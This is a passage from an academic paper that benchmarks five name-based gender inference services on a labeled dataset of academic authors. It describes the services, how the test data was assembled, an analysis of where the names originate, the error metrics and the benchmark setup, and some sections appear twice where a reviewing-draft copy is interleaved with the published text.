under study. Note that although Gender API does provide a specific API end point for handling surnames, our results employ the version that does not make use of them. Gender API gender-guesser genderize.io NameAPI NamSor Database size (January 2018) 1,877,787 45,376 216,286 510,000 1,300,000 Regular data updates yes no yes yes yes Handles unstructured full name strings yes no no yes no Handles surnames yes no no yes yes Handles non-Latin alphabets partially no partially yes yes Implicit geo-localization no no no yes yes Assignment type probabilistic binary probabilistic probabilistic probabilistic Free parameters accuracy, samples – probability, count confidence scale Open source no yes no no no API yes no yes yes yes Monthly free requests 500 unlimited 30,000 10,000 1,000 Monthly subscription cost (100,000 requests/month) 79 ¤ Free 7 ¤ 150 ¤ 80 ¤ Provider Gender-API.com Israel Saeta Pérez Casper Strømgren Optimaize GmbH NamSor SAS Recently, Bonham & Stefan (2017b) have published an analysis of female underrepre- sentation in the field of computational biology, for which they performed a preliminary comparison of three gender assignment tools (Bonham & Stefan, 2017a). The methods tested were the Python package GenderDetector and web APIs genderize.io and Gender API. After inferring the gender of 1,000 names they ultimately chose Gender API for its superior coverage. They did not compute further metrics to validate their election. Lastly, a crucial discussion of the benefits as well as ethical concerns when using gender inference methods was posed in Matias (2014), which presented a multitude of examples of meaningful projects that have applied such tools to various data sources. Links to evaluations and comparisons of name-based gender inference services, including the Open Gender Tracker, which the author co-developed, were provided as well. METHODS Overview of surveyed services We compare five different services for inferring gender from name strings that are among the methods most frequently employed to perform gender assignments in the field of bibliometric studies. Several of them are broadly used by organizations and companies in the private sector as well. Table 1 showcases key characteristics; below we briefly describe each of them. Gender API Gender API (https://gender-api.com/), a gender inference service launched in 2014, offers a standard first name search with capability to handle double names. Furthermore, the API allows queries with a full name, which is internally split into first and last. The service currently supports 178 countries, although it cannot geo-localize a full name per se. Its API Santamaría and Mihaljević (2018), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.156 5/29 https://peerj.com https://gender-api.com/ http://dx.doi.org/10.7717/peerj-cs.156 1Other Python wrappers of the same data are Genderator and SexMachine, but they are mostly unsupported and not Python3- compatible. accepts extra parameters for localized queries though, namely country code, IP address, and browser locale. The response contains gender assignments male, female, or unknown, plus confidence parameters samples and accuracy. The former is the number of database records matching the request, while the latter determines the reliability of the assignment. The service is built upon a combination of data from multiple sources, partially from publicly available governmental records combined with data crawled from social networks. Each name has to be verified by different sources to be incorporated. The service is overall reliable, with its cloud-based infrastructure providing an availability of 99.9%. Python-package gender-guesser Python package gender-guesser (https://pypi.python.org/pypi/gender-guesser/) implements a wrapper around the names data described in Michael (2007), which was made available in Michael (2008)1. The data set comprises over 45,000 names with gender assignments unknown (name not found), andy (androgynous), male, female, mostly_male, or mostly_female. Additionally, the approximate frequency of each name per country is provided, and the gender request can be made with an extra location parameter for better accuracy. The dictionary of names was published a decade ago and has not been updated since, which limits the usefulness of both the package and its underlying data source. On the other hand, the gender assignment of this collection is presumed to be of high quality, with manual checks by native speakers of various countries. genderize.io Online service genderize.io (https://genderize.io/), created in August 2013, attempts to infer the gender of a first name. The response is either male, female, or None, plus two additional confidence parameters, count and probability, representing the number of data entries used to calculate the response and the proportion of names with the gender returned in the response. The underlying data is collected from social networks across 79 countries and 89 languages. Although the service does not geo-localize names automatically, it does accept two optional parameters, location_id and language_id, for more qualified guesses. The providers do not state the sources employed, hence the reliability of the data is difficult to assess. An API and extensions to various languages are available. There are no guarantees about uptime; the service might not be reliable enough for use in critical applications. NameAPI NameAPI (https://www.nameapi.org/) is a free and paid service platform to work with names. It provides functionality in the form of web services to do name parsing, genderizing, matching, formatting, and others. For our benchmark we have concentrated on the genderizing service only. Its underlying data sources are dictionaries with all parts of names extracted from census publications, birth lists, and telephone books from over 55 countries. Original spellings in non-Latin scripts (including transcriptions and transliterations) are also recorded. The gender response can be MALE, FEMALE, NEUTRAL, UNKNOWN, or INDETERMINABLE, weighted by the confidence parameter. The service is able to infer the most likely origin of the name, thus allowing to apply language-specific rules and to geo-localize names whose gender depend on the culture. The service aims to achieve Santamaría and Mihaljević (2018), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.156 6/29 https://peerj.com https://pypi.python.org/pypi/gender-guesser/ https://genderize.io/ https://www.nameapi.org/ http://dx.doi.org/10.7717/peerj-cs.156 high uptime, with 99.999% availability. NameAPI provides an API accessible either from a free or a paid account, with credits that can be purchased on a one-time or monthly subscription basis. NamSor NamSor (http://www.namsor.com/) is a classifier of personal names by gender, country of origin, or ethnicity. The service is able to recognize the linguistic or cultural origin of names, thus allowing it to correctly infer the gender from the first and last name in cases that can be male or female depending on their provenience. NamSor claims to cover all languages, alphabets, countries, and regions. The underlying data consists of 1.3 million unique given names extracted from baby name statistics per country, plus sociolinguistic information (morphology, language, ethnicity, etc.) to extract semantics, which allows it to predict gender for complex cases. The NamSor gender API returns male, female, or unknown values, plus a parameter scale ranging from −1 to +1 to reflect the certainty that a name is male or female, respectively. A basic API for structured names is available for free, whereas the Freemium version accepts unstructured strings and offers higher performance and precision. NamSor’s origin API recognizes the likely cultural provenience of personal names in any alphabet, returning a primary and an alternative potential country of origin, as well as a score to qualify the trustworthiness of the assignment. It is based on a proprietary onomastics model which uses linguistic and cultural information. Assemblage of test data We have gathered, revised, and combined human-annotated author-gender data sets used in various bibliometric studies to date, which we describe below. zbMATH Randomly selected authors from the bibliographical records of the mathematical publications service zbMATH (https://zbmath.org/), sampled in 2014 ignoring names that contained only initials. These authors were manually labeled as ‘female’, ‘male’ or ‘unknown’ by Mihaljević-Brandt, Santamaría & Tullney (2016) using Internet queries to obtain gender information. More precisely, the concrete person behind an author’s name was identified by gathering author profile information from zbMATH and other bibliographic databases. Then, university websites, Wikipedia articles, and similar online sources were searched for gender-indicating titles (Mr, Mrs, etc.) and personal pronouns corresponding to the according person. The zbmath data set consists of 400 names (291 male, 58 female, 51 unknown). genderizeR Sample data sets from the genderizeR package (https://github.com/kalimu/genderizeR), authorships and titles that correspond to records of articles of biographical-items or items- about-individual type, respectively, from all fields of study, published from 1945 to 2014 and drawn from WoS. As described in Wais (2016), the names in both data sets were manually coded as ‘female’, ‘male’, or ‘unknown’ based on results from Internet queries using the authors’ full names, affiliations, biographies, mentions in the press, and photos. Santamaría and Mihaljević (2018), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.156 7/29 https://peerj.com http://www.namsor.com/ https://zbmath.org/ https://github.com/kalimu/genderizeR http://dx.doi.org/10.7717/peerj-cs.156 A name was deemed ‘unknown’ if the coder was not certain enough based on the found information. We have applied a series of preprocessing steps to this data, namely removal of duplicates and names containing only initials. For the ‘titles’ data set we have used a naive named-entity extractor based on Python’s package nltk’s POS tagger to identify names in the articles’ titles. Generally, NER tasks are better solved with more potent packages, such as Stanford’s CoreNLP. In this case though, the small size of the data set allowed for a manual check of all extracted names to guarantee correctness. After revising both sources, genderize_r_titles and genderize_r_authors, the data set consists of 1,037 names (740 male, 145 female, 152 unknown). PubMed Data set from Filardo et al. (2016), built by querying the six journals with highest JCR impact factor in 2012 in the category Medicine, general & internal for original research articles between 1994 and 2014. Incidentally, this data has also been used to tune the gender assignment methods of Bonham & Stefan (2017b). Filardo et al. (2016) determined the gender of the first author of each of the articles as ‘female’, ‘male’, or ‘unknown’ by first inspecting the forename. If this was judged to be insufficient to assign a gender, the authors searched institutional websites, social media accounts, photographs, and biographical paragraphs to gather more information. We further removed duplicates and records with empty first names or initials only. The pubmed data set consists of 1,952 names (1,209 male, 714 female, 29 unknown). WoS Data set produced for the validation study reported in Larivière et al. (2013b) that informed the findings of Larivière et al. (2013a), consisting of records from the WoS database covering all publications from 2008 to 2012 included in Science Citation Index Expanded, the Social Sciences Citation Index, and the Arts and Humanities Citation Index. From each of the five categories ‘initials’, ‘unknown’, ‘unisex’, ‘male’, and ‘female’, 1,000 names were randomly sampled and associated with a specific country, institution, and, in some cases, an email address. This information was used by Larivière et al. (2013a) to locate biographical information and, based on that, manually assign a gender. From this data set of 5,000 names we have further removed records from the ‘initials’ subset and duplicates with respect to the previous data sets. The final wos data set consists of 3,687 names (1,571 male, 1,051 female, 1,065 unknown). After concatenating all data sets we ran a sanity check consisting of finding names that had been consistently misclassified by all gender inference services, and performed manual corrections to amend incorrectly assigned labels. In total, we double-checked 74 author names and manually changed the gender label of 46 of them by searching preferably for personal pronouns, gender-indicating titles, and, ultimately, photos in university websites, professional social media sites, conference web pages, and similar sources. All undertaken preprocessing steps can be found in Mihaljević & Santamaría (2018). Our final data set consists of 7,076 names (3,811 male, 1,968 female, 1,297 unknown), split into three components: first, middle, and last name. About 13% of them contain a middle name, and the number of unique combinations of first and middle name in the data Santamaría and Mihaljević (2018), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.156 8/29 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.156 2NamSor provides a diaspora API to address onomastic classification for countries with historically high immigration rates like the USA. Table 2 Examples of the geographical origins of names as inferred by NamSor’s origin API. Full_name Gender Source Country Top_region Sub_region Score maria bortolini f wos Italy Europe Southern Europe 2.925873 liew woei kang m pubmed China Asia Eastern Asia 2.638786 sirin yasar f wos Turkey Asia Western Asia 3.357177 set is 3,956. The most common male names are ‘John’, ‘David’, and ‘Michael’; the most frequent female ones are ‘Susan’, ’Christine’, ‘Laura’, and ‘Anne’. We point out that we use ‘female’ and ‘male’ as categories solely because the evaluated services operate under the gender binary paradigm; our concerns to this approach are spelled out in the discussion. To the best of our knowledge this collection is the largest sample of labeled gender data corresponding to authors of academic publications to date. In order to promote further research on the topic, we make our data set available to interested researchers (Mihaljević & Santamaría, 2018). Origin of the names The assembled data set described above does not include any information regarding the origin or geographic provenience of the persons’ names. It is well known that the cultural context is an important aspect affecting the reliability of gender inference methods. We thus seek to evaluate the geographical and cultural diversity of our data set as well as to measure the impact of the names’ origins on the performance of the surveyed services. As described above, NamSor’s origin API is able to produce an anthroponomical classification of a personal name by allocating an onomastic class, i.e., a country, subregion, and region, to it. The inferred origin is reported in conjunction with a score that calibrates its reliability. According to NamSor’s internal evaluations, for names from Europe, Asia, and Africa the classifications with score > 0 are trustworthy. Note that the USA is not considered an onomastic class on its own but rather a melting pot of other ‘cultural origins’ such as Ireland or Germany (Carsenat, 2014)2. Similarly, names from other parts of the Americas are considered to be of (Southern) European descent. Table 2 shows a few examples of the anthroponomical classifications produced by NamSor’s origin API. We have applied NamSor’s origin API to our collection of 7,076 names and are able to assign a provenience to 97% (6,866) of them that return a score above 0, and that we keep for further analysis. The service was queried in May 2018. NamSor estimates 4,228 names (61%) to be of European origin, 2,304 (34%) of Asian, and 334 (5%) of African provenience. We have split the analysis by the different data sources; results are displayed in Fig. 1. The wos collection contains approximately 45% Asian and 50% European names; given the fact that wos is larger than any of the other data subsets, this ensures a satisfactory representation of Asian names in the whole test data set. For the other data sources, names of European origin clearly predominate, especially in the genderize_r subsets. In short, our data set shows a majority of European and Asian names; understandably for a sample coming from scientific publishing, the proportion of African names is small. A more fine-grained geographical analysis focusing on countries, rather than regions, reveals that the names in our test data originate from 113 countries; however, just 16 of Santamaría and Mihaljević (2018), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.156 9/29 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.156 0% 20% 40% 60% 80% 100% wos pubmed genderize_r_titles genderize_r_authors zbmath Europe Asia Africa Figure 1 Geographical region of origin of the personal names from our test data set as inferred by NamSor’s origin API. The colored bars show percentages split by data sources. The genderize_r data sets are the most Eurocentric, whereas the wos collection is more balanced towards Asian names. African names amount to at most 6% per data source, which reflects the shortage of scholarly authors from that region. Full-size DOI: 10.7717/peerjcs.156/fig-1 them already cover 75% of the whole data set. The most frequent country of origin is the UK, followed by Germany, China, and Ireland. Splitting the analysis among the five data sources confirms that both genderize_r datasets are very Eurocentric: they have almost no Asian countries among the top 10 most frequent ones. They also show the lowest diversity, with the top three countries (UK, Germany, and Ireland) covering 50% of all names and the top 10 covering 75%. On the contrary, the highest variability appears in the smallest data set zbmath, where the top three countries (Germany, Japan, and the UK) contain 26% of all names and the top 10 cover 60%. The larger wos data set exhibits the best representation of Asian origins: China, Japan, and Korea appear in positions 1st, 3rd, and 6th in terms of frequency. Full figures and statistics can be found in our dedicated Jupyter notebook in Mihaljević & Santamaría (2018). The analysis of cultural and geographical provenience of the personal names contained in our data set brings us to the conclusion that our collection is reasonably diverse and shows an acceptable variability with respect to origin, with the aforementioned caveats about African names. Retrieval of gender assignments We have performed systematic queries to the services under study to obtain an inferred gender for all records in our test data set. All queries were performed in mid December 2017. Depending on their peculiarities, we sent different requests to the various APIs. Concretely, genderize.io and gender-guesser do not handle last names, therefore we queried using first and middle names only. When both a first and a middle name were present we tried their combinations (e.g., ‘Jae Il’, alternatively ‘Jae-Il’). If no response was obtained, only the first name was used (e.g., ‘Jae’). The free NamSor API requires the name to be structured as split forename(s) and last name. Gender API offers two distinct end points, one for forename(s) only and another capable of splitting unstructured full name strings. We evaluated both methods in our benchmark and found that the former performs notably better, thus we Santamaría and Mihaljević (2018), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.156 10/29 https://peerj.com https://doi.org/10.7717/peerjcs.156/fig-1 http://dx.doi.org/10.7717/peerj-cs.156 report results for that variant. NameAPI accepts unstructured strings per se. We tested it using the full name string and the forename(s) only, for better comparison with the name splitting mechanism of Gender API. However, in this case querying with the full name string achieves significantly better results, hence we report the performance of NameAPI for this variant. Performance metrics Name-based gender inference can be considered as a classification problem, and as such there exist plenty of metrics to measure the performance of a classifier. The choice of performance indicators needs to be suitable for the problem at hand and is usually a non-trivial task in the development of data-based algorithms. For further background readings related to classification and learning algorithms in general, such as training and testing, cross-validation, typical error estimates and statistical significance testing, see e.g., Hastie, Tibshirani & Friedman (2009) and Japkowicz & Shah (2014). The names in our evaluation data set have been manually labeled as ‘female’, ‘male’, or ‘unknown’. Recall that those labeled as ‘unknown’ refer to individuals for whom it was not possible to find sufficient gender-related information online. Therefore the class ‘unknown’ is rather a heterogeneous label applied to people with either very common names or those that avoid providing much personal information online. In particular, it is not a ‘gender class’ in any suitable sense, and cannot be included appropriately in quantitative evaluations using performance metrics. In what follows, we will not make use of the items with manual label ‘unknown’ for any of our calculations and results, working instead with the 5,779 names in our data set which possess a defined gender label. (For a discussion of ethical considerations of name-based gender inference methods and the methodological shortcomings of such approaches, see the ‘Discussion’.) On the other hand, the services evaluated here do return, along with the responses ‘female’ and ‘male’, at least a label ‘unknown’ for the unidentified cases. Hence, in terms of the true labels we are dealing with a binary classification problem, while the predictions contain one or more extra output classes. This makes it difficult to pose name-based inference as a standard classification problem and to utilize commonly used metrics such as precision and recall. In our case it makes sense to work instead with metrics derived from the confusion matrix defined as follows: Recall that those labeled as ‘unknown’ refer to individuals for whom it was not possible to find sufficient333 gender-related information online. Therefore the class ‘unknown’ is rather a heterogeneous label applied334 to people with either very common names or those that avoid providing much personal information online.335 In particular, it is not a ‘gender class’ in any suitable sense, and cannot be included appropriately in336 quantitative evaluations using performance metrics. In what follows, we will not make use of the items337 with manual label ‘unknown’ for any of our calculations and results, working instead with the 5,779338 names in our data set which possess a defined gender label. (For a discussion of ethical considerations of339 name-based gender inference methods and the methodological shortcomings of such approaches, see the340 Discussion.) On the other hand, the services evaluated here do return, along with the responses ‘female’341 and ‘male’, at least a label ‘unknown’ for the unidentified cases. Hence, in terms of the true labels we342 are dealing with a binary classification problem, while the predictions contain one or more extra output343 classes.344 This makes it difficult to pose name-based inference as a standard classification problem and utilize345 commonly used metrics such as precision and recall. In our case it makes sense to work instead with346 metrics derived from the confusion matrix defined as follows:347 predicted class male female unknown tr ue cl as s male mm mf mu female fm ff fu Let us introduce the following nomenclature for the components of the confusion matrix, which in348 general we will refer to as assignments: elements in the diagonal (mm and ff) are the correct classifications,349 while elements outside it (mf and fm) are thus misclassifications. The sum of both can be simply referred350 to as classifications. Consequently, elements mu and fu represent non-classifications, since the algorithm351 fails at predicting one of the classes ‘male’ or ‘female’. All mistakes, both misclassifications and non-352 classifications, are included under the term inaccuracies. Based on the confusion matrix, Wais (2016)353 introduced four performance metrics:354 errorCoded = fm + mf + mu + fu mm + fm + mf + ff + mu + fu , errorCodedWithoutNA = fm + mf mm + fm + mf + ff , naCoded = mu + fu mm + fm + mf + ff + mu + fu , errorGenderBias = mf − fm mm + fm + mf + ff . The errors above are to be interpreted as follows: errorCoded treats a non-classification as a regular er-355 ror and penalizes it in the same way as a misclassification, therefore it encodes the fraction of inaccuracies356 over the total number of assignments; errorCodedWithoutNA measures the share of misclassifications over357 the total number of classifications while ignoring non-classifications; naCoded computes the proportion358 of non-classifications over the total number of assignments; errorGenderBias estimates the direction of359 the bias in gender prediction, indicating whether there are more females misclassified as male, or vice360 versa. If positive, then the estimated number of women is higher than in the real data.361 Depending on the concrete usage of an algorithm, these metrics can be suitable or not. For instance, if362 not being able to assign a gender to a large number of names is acceptable while high prediction accuracy363 is essential, errorCodedWithoutNA should be minimized. For most purposes, however, it is desirable to364 infer the gender for as many names as possible without treating non-classifications as a regular error. For365 this purpose we have defined two extensions of the metrics above.366 Let w ∈ [0,1]. We define the weightedError as367 weightedErrorw = fm + mf + w ∗(mu + fu) mm + fm + mf + ff + w ∗(mu + fu) . For w = 0 the weightedError equals errorCodedWithoutNA and for w = 1 we recover errorCoded368 exactly. For 0 < w < 1 we define a metric which penalizes misclassifications more than non-classifications.369 To clarify this further, consider the following examples of confusion matrices:370 9/21 PeerJ Comput. Sci. reviewing PDF | (CS-2018:02:24563:1:0:NEW 28 May 2018) Manuscript to be reviewedComputer Science Let us introduce the following nomenclature for the components of the confusion matrix, which in general we will refer to as assignments: elements in the diagonal (mm and ff) are the correct classifications, while elements outside it (mf and fm) are thus misclassifications. The sum of both can be simply referred to as classifications. Consequently, elements mu and fu represent non-classifications, since the algorithm fails at predicting one of the classes Santamaría and Mihaljević (2018), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.156 11/29 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.156 ‘male’ or ‘female’. All mistakes, both misclassifications and non-classifications, are included under the term inaccuracies. Based on the confusion matrix, Wais (2016) introduced four performance metrics: errorCoded = fm+mf+mu+fu mm+fm+mf+ff+mu+fu , errorCodedWithoutNA = fm+mf mm+fm+mf+ff , naCoded = mu+fu mm+fm+mf+ff+mu+fu , errorGenderBias = mf−fm mm+fm+mf+ff . The errors above are to be interpreted as follows: errorCoded treats a non-classification as a regular error and penalizes it in the same way as a misclassification, therefore it encodes the fraction of inaccuracies over the total number of assignments; errorCodedWithoutNA measures the share of misclassifications over the total number of classifications while ignoring non-classifications; naCoded computes the proportion of non-classifications over the total number of assignments; errorGenderBias estimates the direction of the bias in gender prediction, indicating whether there are more females misclassified as male, or vice versa. If positive, then the estimated number of women is higher than in the real data. Depending on the concrete usage of an algorithm, these metrics can be suitable or not. For instance, if not being able to assign a gender to a large number of names is acceptable while high prediction accuracy is essential, errorCodedWithoutNA should be minimized. For most purposes, however, it is desirable to infer the gender for as many names as possible without treating non-classifications as a regular error. For this purpose we have defined two extensions of the metrics above. Let w ∈[0,1]. We define the weightedError as weightedErrorw = fm+mf+w∗(mu+fu) mm+fm+mf+ff+w∗(mu+fu) . For w =0 the weightedError equals errorCodedWithoutNA and for w =1 we recover errorCoded exactly. For 0 < w < 1 we define a metric which penalizes misclassifications more than non-classifications. To clarify this further, consider the following examples of confusion matrices: Santamaría and Mihaljević (2018), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.156 12/29 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.156 C1 = male female unknown male 11 2 6 female 1 7 4 C2 = male female unknown male 11 6 2 female 4 7 1 For both confusion matrices the fraction of inaccuracies over all assignments is the same (and371 equals 0.419), while C1 exhibits a smaller proportion of misclassifications, given than the number of372 non-classifications is larger than in C2:373 errorCoded0.2(C1) = 1 + 2 + 0.2 ∗(6 + 4) 11 + 1 + 2 + 7 + 0.2 ∗(6 + 4) = 0.217, errorCoded0.2(C2) = 4 + 6 + 0.2 ∗(2 + 1) 11 + 4 + 6 + 7 + 0.2 ∗(2 + 1) = 0.371. Another, even simpler possibility to penalize non-classifications without giving them the same374 importance as to misclassifications is to minimize a metric such as errorCodedWithoutNA, which ignores375 the class ‘unknown’, while enforcing a constraint on naCoded, i.e. the rate of non-classifications. Indeed376 any two metrics can be combined in this way. However, a disadvantage of this approach is that, for certain377 constraint values, there is no solution in the parameter space of a given gender inference model. Thus, it378 makes sense to consider the distribution of error values depending on the tuning parameters before setting379 a definite constraint value. In our benchmarks, if the constraint cannot be satisfied on a training set, we380 have set the test set error to 1, which is the maximum achievable value.381 RESULTS382 Prior to parameter tuning and benchmarking we have performed sample requests to all services in383 order to test potentially problematic cases, such as double names and diacritics. All services under384 study are sensitive towards accents and return different responses when e.g. applied to the names ‘José385 Marı́a’ and ‘José Maria’. However, NamSor and NameAPI show less sensitivity than Gender API and386 genderize.io. For instance, NameAPI returns the same value of the free parameter for both ‘Jose’/‘José’387 and ‘Maria’/‘Marı́a’, respectively, but makes a difference when queried with a double name.388 The handling of double names is actually not completely transparent for most of the services. In the389 cases of ‘Mary-Jane’ or ‘Jane-Mary’, Gender API returns a count value resulting of adding those for390 ‘Mary’ and ‘Jane’. This pattern persists when concatenating further names of the same gender, e.g. as in391 ‘Mary-Jane-Sarah’. Yet when name parts are joined with empty space instead of hyphen, the count values392 are not added, which shows that a different logic is being applied. The response of genderize.io also393 depends on the character connecting the name parts. This indicates a low level of semantical preprocessing394 of the data sources for both services. We have found examples displaying similar behavior in NamSor,395 while NameAPI seems to be less susceptible to this kind of artifacts.396 As pointed out in Wais (2016), names used in social network profiles may contain arbitrary words397 or characters. This ‘bogus data’ is not filtered out of the underlying data base of genderize.io, resulting398 on stop words like ‘with’ or ‘I’ having a gender assigned to them. The same is true to a similar extent399 for Gender API, while NameAPI and NamSor show a higher level of data curation. The package400 gender-guesser contains a priori only vetted names.401 Both NameAPI and NamSor make use of the surname in order to provide a more accurate gender402 guess for names which depend significantly on the cultural context. We tested this on a few examples403 such as ‘Andrea Schmidt’ vs. ‘Andrea Bocelli’ or ‘Rosario González’ vs. ‘Rosario Giordano’; the two404 services responded with the expected gender categories, showing a correct identification of the surname405 with a particular country of origin. Gender API and genderize.io do assign a gender to names like ‘Andrea’406 or ‘Rosario’, but with lower accuracy values. When queried with unisex first names such as ‘Mika’,407 ‘Addison’, ‘Ash’, or ’Dakota’, NameAPI returns ‘neutral’ or ‘unknown’. NamSor, Gender API, and408 genderize.io interpret some of these names as gender neutral by assigning a value of their free parameter409 close to 0, while gender-guesser also treats names as ambiguous via the qualifier mostly.410 10/21 PeerJ Comput. Sci. reviewing PDF | (CS-2018:02:24563:1:0:NEW 28 May 2018) Manuscript to be reviewedComputer Science For both confusion matrices the fraction of inaccuracies over all assignments is the same (and equals 0.419), while C1 exhibits a smaller proportion of misclassifications, given that the number of non-classifications is larger than in C2: errorCoded0.2(C1)= 1+2+0.2∗(6+4) 11+1+2+7+0.2∗(6+4) =0.217, errorCoded0.2(C2)= 4+6+0.2∗(2+1) 11+4+6+7+0.2∗(2+1) =0.371. Another even simpler possibility to penalize non-classifications without giving them the same importance as to misclassifications is to minimize a metric such as errorCodedWithoutNA, which ignores the class ‘unknown’, while enforcing a constraint on naCoded, i.e., the rate of non-classifications. Indeed any two metrics can be combined in this way. However, a disadvantage of this approach is that, for certain constraint values, there is no solution in the parameter space of a given gender inference model. Thus, it makes sense to consider the distribution of error values depending on the tuning parameters before setting a definite constraint value. In our benchmarks, if the constraint cannot be satisfied on a training set, we have fixed the test set error to 1, which is the maximum achievable value. RESULTS Prior to parameter tuning and benchmarking we have performed sample requests to all services in order to test potentially problematic cases, such as double names and diacritics. All services under study are sensitive towards accents and return different responses when e.g., applied to the names ‘José María’ and ‘José Maria’. However, NamSor and NameAPI show less sensitivity than Gender API and genderize.io. For instance, NameAPI returns the same value of the free parameter for both ‘Jose’/‘José’ and ‘Maria’/‘María’, respectively, but makes a difference when queried with a double name. The handling of double names is actually not completely transparent for most of the services. In the cases of ‘Mary-Jane’ or ‘Jane-Mary’, Gender API returns a count value resulting of adding those for ‘Mary’ and ‘Jane’. This pattern persists when concatenating further names of the same gender, e.g., as in ‘Mary-Jane-Sarah’. Yet when name parts are joined with empty space instead of hyphen, the count values are not added, which shows that a different logic is being applied. The response of genderize.io also depends on the character connecting the name parts. This indicates a low level of semantical preprocessing Santamaría and Mihaljević (2018), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.156 13/29 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.156 of the data sources for both services. We have found examples of similar behavior in NamSor, while NameAPI seems to be less susceptible to this kind of artifacts. As pointed out in Wais (2016), names used in social network profiles may contain arbitrary words or characters. This ‘bogus data’ is not filtered out of the underlying data base of genderize.io, resulting in stop words like ‘with’ or ‘I’ having a gender assigned to them. The same is true to a similar extent for Gender API, while NameAPI and NamSor show a higher level of data curation. The package gender-guesser contains a priori only vetted names. Both NameAPI and NamSor make use of the surname in order to provide a more accurate gender guess for names which depend significantly on the cultural context. We tested this on a few examples such as ‘Andrea Schmidt’ vs. ‘Andrea Bocelli’ or ‘Rosario González’ vs. ‘Rosario Giordano’; the two services responded with the expected gender categories, showing a correct identification of the surname with a particular country of origin. Gender API and genderize.io do assign a gender to names like ‘Andrea’ or ‘Rosario’, but with lower accuracy values. When queried with unisex first names such as ‘Mika’, ‘Addison’, ‘Ash’, or ’Dakota’, NameAPI returns ‘neutral’ or ‘unknown’. NamSor, Gender API, and genderize.io interpret some of these names as gender neutral by assigning a value of their free parameter close to 0, while gender-guesser also treats names as ambiguous via the qualifier mostly. Parameter tuning All methods under study with exception of gender-guesser return, in addition to the gender, one or two numerical parameters to estimate the quality of the inference. Figure 2 shows the distribution of these free parameters when using NameAPI, NamSor, Gender API, and genderize.io to assign genders to all names in our test data set. For gender-guesser (not displayed) we have created one such parameter by setting it to 0.75 for responses ‘mostly_female’ or ‘mostly_male’ and 1 for ‘female’ or ‘male’. Figure 2A suggests that NameAPI’s parameter confidence exhibits a bimodal distribution that peaks at around 0.90, with a secondary maximum at 1 (absolute certainty on the gender assignment). All names reach a confidence of at least 0.70. Figure 2B indicates that NamSor assigns a gender with absolute certainty to most of the names in the data set, although some outliers are spread out at smaller values of the scale parameter. Figures 2C and 2D show the two-dimensional parameter spaces of Gender API and genderize.io: one parameter encodes the number of appearances of a name (denominated samples and count, respectively), and the other shows the confidence on its gender assignment (named accuracy and probability). Most names fall in the bottom right region of high confidence and low number of counts. In general, there is no mathematical model that can be trained in the classical sense of machine learning. Instead, for every service, we have ‘trained’ (or ‘tuned’) the algorithms by trying out randomly sampled parameter values. Assuming that a gender classification might not be reliable under some given threshold for the confidence indicators, we have searched for those parameter values that minimize a certain error. A particular instantiation of a random grid of sampled parameters used for each service (except gender-guesser) is displayed as black dots in Fig. 2 as well. Santamaría and Mihaljević (2018), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.156 14/29 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.156 0.6 0.8 1.0 0 500 1000 1500 2000 confidence A. NameAPI 0.2 0.4 0.6 0.8 1.0 0 1000 2000 3000 4000 scale B. NamSor 50 60 70 80 90 100 0 100000 200000 300000 400000 0 2000 samples 0 1000 2000 accuracy C. Gender API 0.5 0.6 0.7 0.8 0.9 1.0 0 2000 4000 6000 8000 10000 12000 0 1000 2000 count 0 1000 2000 3000 4000 probability D. genderize.io Figure 2 Distribution of free parameters after querying the gender inference services with all f/m names from our test data set. (A) and (B) return one parameter, while (C) and (D) return two. In black, a particular instantiation of the grid of parameters per service used to perform parameter tuning is shown. Full-size DOI: 10.7717/peerjcs.156/fig-2 Benchmark setting We define a series of benchmarks to compare the methods under study. To begin with, we compute performance metrics using the default gender responses for all services, i.e., with no error minimization through parameter tuning (Benchmark 1). Next, we introduce further Benchmarks 2, 3, and 4, each of which concentrates on a particular scenario defined by conditions on the metrics to be optimized. All performed benchmarks are evaluated two-fold: (a) on the entire data set, and (b) differentiating between the five data sources as described in ‘Assemblage of test data’. The latter case is particularly relevant e.g., for researchers in scientometrics looking for the most suitable gender inference algorithm for a particular data source such as PubMed, whereas the former is most appropriate when analyzing different data collections, as e.g., in Holman, Stuart-Fox & Hauser (2018). To better illustrate the role of the names’ origin, Benchmark 1b is additionally broken down by geographical regions first and then by Asian subregions, which turn out to be the most challenging. For Benchmarks 2a, 3a, and 4a we run 10 trials of 10-fold cross-validation. In each, we randomly select (at most) 40 parameter values per service for training, and record the average error on the test sets with those parameters that minimized the respective error on Santamaría and Mihaljević (2018), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.156 15/29 https://peerj.com https://doi.org/10.7717/peerjcs.156/fig-2 http://dx.doi.org/10.7717/peerj-cs.156 the training sets. The tuning parameters as well as the training/test set splits are randomly selected with fixed seed numbers, thus ensuring reproducibility. In Benchmarks 2b, 3b, and 4b we perform one trial of 10-fold cross-validation per service and data set, and record the average error on the test sets. Since the individual data sets differ significantly in size, we have used at most 20 parameters for the smaller data sets zbmath, genderize_r_authors and genderize_r_titles. For the larger data sets pubmed and wos, we have allowed at most 30 and 35 tuning parameters, respectively. Finally, we apply several tests to assess the statistical significance of the observed differences. In the b-versions of our benchmarks, we first apply the non-parametric Friedman test and then suitable post-hoc tests. We refrain from using ANOVA, which is the usually recommended parametric alternative to evaluate multiple classifiers on multiple data sets, since the homogeneous covariance assumption is not satisfied across all services and data sets. In each benchmark, we compare the two best performers using suitable parametric or non-parametric tests for two classifiers. For more details on statistical significance tests suited for classification algorithms, see Demšar (2006) and Japkowicz & Shah (2014)[Chapter 6]. The code for the benchmark evaluations can be found in Mihaljević & Santamaría (2018). Benchmark 1: Default responses First, we use the gender inference services employing their default responses, i.e., considering all ‘female’ and ‘male’ gender attributions regardless of the value of the confidence parameters. Benchmark 1a: entire data set We report the resulting figures for correct classifications, 